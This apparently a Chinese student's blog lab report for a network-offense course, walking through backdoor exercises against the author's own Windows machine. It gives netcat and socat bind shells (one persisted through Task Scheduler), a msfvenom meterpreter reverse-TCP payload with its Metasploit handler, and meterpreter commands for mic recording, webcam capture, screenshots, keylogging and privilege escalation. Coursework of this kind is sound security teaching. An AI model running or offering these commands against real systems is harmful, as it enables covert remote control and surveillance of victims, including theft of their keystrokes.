网络对抗EXP2后门原理与实践

1.实验环境

  • 主机一台联想台式机,安装有win10系统 。
  • 安装的kali虚拟机为攻击机。
  • 我的win10系统作为靶机。(建议再安装一个虚拟机作为靶机,不要像我这么做。我电脑有点卡,就没有安装那么多虚拟机了)
  • win10系统里,需要安装好ncat工具和socat工具,下载地址见老师的码云。
  • win10的IP是172.16.2.29,kali虚拟机的IP是192.168.114.129.

    2.实验内容 (3.5分)

  • (1)使用netcat获取主机操作Shell,cron启动 (0.5分)
  • (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分)
  • (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
  • (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
  • (5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。

3.实验步骤

3.1使用netcat获取主机操作Shell,cron启动

1.在win7的cmd里,进入c:\ncat\ncat,输入ncat -l -e cmd.exe -p 4306

 

2.在kali的终端里,输入nc 192.168.53.140 4306连接win7,获得shell权限

 

3.2使用socat获取主机操作Shell, 任务计划启动

1.在Windows桌面按键win+I,依次打开 控制面板->系统和安全->管理工具->任务计划,新建一个任务

 

设置如上

2.新建一个触发器

 

设置如上

3.新建一个操作

 

设置如上,其中参数为tcp-listen:4306 exec:cmd.exe,pty,stderr ,4306为端口号

4.确定,查看程序是否在运行,如未运行点击右侧运行按钮使其运行

 

5.Linux输入指令 socat - tcp:192.168.53.140:4306, windows主机IP、端口号,此时可以获取win的shell命令

 

 

3.1 利用msfvenom指令生成后门程序

 

1.在Linux主机输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=Linux的IP LPORT=端口 -f exe > 20154306_backdoor.exe,此条指令意为生成一个.exe程序,名称为 20154306_backdoor,将来在windows上运行时会回连到Linux主机相应端口

 

 

 

2.成功之后该文件在当前目录,找到之后拷贝到Windows主机,地址随意

 

 


 

 

3.2 linux进入控制台进行设置

 

1.Linux输入指令msfconsole

 

 

 

2.在msf>下输入命令use exploit/multi/handler

 

3.继续输入set payload windows/meterpreter/reverse_tcp 设置payload

 

4.输入指令set LHOST Linux IP

 

5.输入指令 set LPORT 4306

 

6.输入指令show options

 

 

 

3.3 linux开启监听,windows运行后门

 

1.Linux输入指令exploit 开始监听

 

2.windows主机双击后门木马程序执行

 

 

 

ps:也可如上图在win主机cmd中执行

 

3.4 Linux主机操控Windows主机

 

3.4.1 输入指令record_mic 录制一段音频

 

 

 

3.4.2 输入指令webcam_snap 拍摄照片

 

 

 

 

 

3.4.3 输入指令screenshot 截取屏幕

 

 

 

3.4.4 输入指令keyscan_start记录击键内容,输入指令keyscan_dump 获取击键记录

 

 

 

下图是我在win主机上输入的内容

 

 

3.4.5 输入指令getuid 查看当前用户,输入指令getsystem 提权

 

 

 

posted @ 2018-03-29 21:21  20154306  阅读(187)  评论(0编辑  收藏  举报